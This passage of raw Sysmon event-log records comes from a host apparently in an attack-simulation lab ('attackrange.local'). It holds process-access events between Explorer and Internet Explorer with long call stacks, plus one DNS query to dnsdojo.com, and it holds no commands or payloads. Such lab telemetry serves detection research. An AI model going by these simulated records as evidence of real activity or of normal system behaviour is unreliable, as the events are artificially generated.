Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:08.693{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:08.693{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:08.677{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:08.677{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:08.677{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\system32\wininetlui.dll+1cf4(wow64)|C:\Windows\system32\wininetlui.dll+1a52(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6011(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6c20(wow64)|C:\Windows\SYSTEM32\WININET.dll+2b5ded(wow64)|C:\Windows\SYSTEM32\WININET.dll+26a831(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1502c6(wow64) 10341000x800000000000000014319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:10.552{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:10.552{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:10.552{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:10.537{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:10.537{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:11.271{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:11.271{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:11.271{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:11.255{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:11.255{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:11.240{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\system32\wininetlui.dll+1cf4(wow64)|C:\Windows\system32\wininetlui.dll+1a52(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6011(wow64)|C:\Windows\SYSTEM32\WININET.dll+2f6c20(wow64)|C:\Windows\SYSTEM32\urlmon.dll+eb4d3(wow64)|C:\Windows\SYSTEM32\urlmon.dll+eb239(wow64)|C:\Windows\SYSTEM32\urlmon.dll+381a1(wow64) 22542200x800000000000000014333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:10.351{08A6967A-4781-6000-3A05-000000009A01}6928www.dnsdojo.com0type: 5 dnsdojo.com;::ffff:216.146.39.125;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000014332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:12.615{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:12.615{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:12.615{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:12.615{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:12.615{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:12.584{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:12.584{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:14.037{08A6967A-4754-6000-1705-000000009A01}34082188C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:14.021{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:14.021{08A6967A-4754-6000-1705-000000009A01}34085404C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:14.021{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa08(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba9bf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1ba966(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a8abf(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b324e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b319b(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d11d0(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d4239(wow64) 10341000x800000000000000014353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.943{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4A73-6000-9405-000000009A01}1384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:43:15.943{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 